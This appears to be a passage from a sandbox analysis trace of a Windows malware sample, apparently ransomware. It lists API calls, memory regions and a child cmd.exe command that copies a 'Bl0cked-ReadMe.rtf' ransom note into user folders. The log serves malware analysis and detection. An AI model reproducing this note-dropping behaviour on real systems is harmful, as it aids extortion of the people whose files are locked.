lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.674] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.674] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, 
lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 
| out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.675] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.675] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x32, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x32, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.675] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.676] _close (_FileHandle=4) returned 0 [0225.676] FindNextFileW (in: hFindFile=0x3d0e60, lpFindFileData=0x2eeeac | out: lpFindFileData=0x2eeeac) returned 0 [0225.677] GetLastError () returned 0x12 [0225.677] FindClose (in: hFindFile=0x3d0e60 | out: hFindFile=0x3d0e60) returned 1 [0225.677] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0225.677] _close (_FileHandle=3) returned 0 [0225.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.678] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.678] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.678] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.678] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.678] SetConsoleInputExeNameW () returned 0x1 [0225.678] GetConsoleOutputCP () returned 0x1b5 [0225.678] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.678] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.679] exit (_Code=0) Process: id = "588" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b80" os_pid = "0xd44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT 
AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33569 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33570 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33571 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33572 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 33573 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33574 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33575 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33576 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33577 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 33578 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33683 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000010000" filename = "" Region: id = 33684 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33685 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33686 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 33687 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 33688 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33689 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33690 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33691 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33692 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33693 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" 
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33694 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33695 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33696 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33697 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 33698 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33699 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33700 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 33701 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 33702 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 33703 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 33704 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 33705 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 33706 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 811 os_tid = 0xe78 [0224.679] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fe74 | out: lpSystemTimeAsFileTime=0x18fe74*(dwLowDateTime=0xb9902f80, dwHighDateTime=0x1d440a9)) [0224.679] GetCurrentProcessId () returned 0xd44 [0224.679] GetCurrentThreadId () returned 0xe78 [0224.679] GetTickCount () returned 0x3e159 [0224.679] QueryPerformanceCounter (in: lpPerformanceCount=0x18fe6c | out: lpPerformanceCount=0x18fe6c*=28146814945) returned 1 [0224.679] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0224.679] __set_app_type (_Type=0x1) [0224.679] __p__fmode () returned 0x76b331f4 [0224.680] __p__commode () returned 0x76b331fc [0224.680] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0224.680] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0224.680] GetCurrentThreadId () returned 0xe78 [0224.680] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe78) returned 0x38 [0224.680] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0224.680] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0224.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.681] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0224.681] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, 
phkResult=0x18fe04 | out: phkResult=0x18fe04*=0x0) returned 0x2 [0224.681] VirtualQuery (in: lpAddress=0x18fe3b, lpBuffer=0x18fdd4, dwLength=0x1c | out: lpBuffer=0x18fdd4*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.681] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fdd4, dwLength=0x1c | out: lpBuffer=0x18fdd4*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0224.681] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fdd4, dwLength=0x1c | out: lpBuffer=0x18fdd4*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0224.681] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fdd4, dwLength=0x1c | out: lpBuffer=0x18fdd4*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.681] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fdd4, dwLength=0x1c | out: lpBuffer=0x18fdd4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0224.681] GetConsoleOutputCP () returned 0x1b5 [0224.681] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.682] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0224.682] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.682] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0224.682] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.682] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0224.682] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.682] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0224.682] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0224.683] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0224.683] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.683] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0224.683] GetEnvironmentStringsW () returned 0x240198* [0224.683] FreeEnvironmentStringsW (penv=0x240198) returned 1 [0224.683] GetEnvironmentStringsW () returned 0x240198* [0224.683] FreeEnvironmentStringsW (penv=0x240198) returned 1 [0224.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ed74 | out: phkResult=0x18ed74*=0x40) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0xc0, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x1, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0x1, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x0, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x40, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, 
lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x40, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0x40, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegCloseKey (hKey=0x40) returned 0x0 [0224.684] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ed74 | out: phkResult=0x18ed74*=0x40) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0x40, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x1, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0x1, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x0, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x9, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: 
lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x9, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0x9, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegCloseKey (hKey=0x40) returned 0x0 [0224.684] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b8 [0224.684] srand (_Seed=0x5b8863b8) [0224.684] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" [0224.684] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" [0224.684] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.685] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2418f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0224.685] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0224.685] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0224.685] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0224.685] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0224.685] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0224.685] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0224.685] _wcsicmp 
(_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0224.685] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0224.685] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0224.685] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0224.685] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0224.685] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0224.685] GetEnvironmentStringsW () returned 0x2422e8* [0224.685] FreeEnvironmentStringsW (penv=0x2422e8) returned 1 [0224.685] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.685] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0224.685] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0224.685] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0224.685] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0224.685] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0224.685] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0224.685] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0224.685] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0224.686] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0224.686] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fb40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 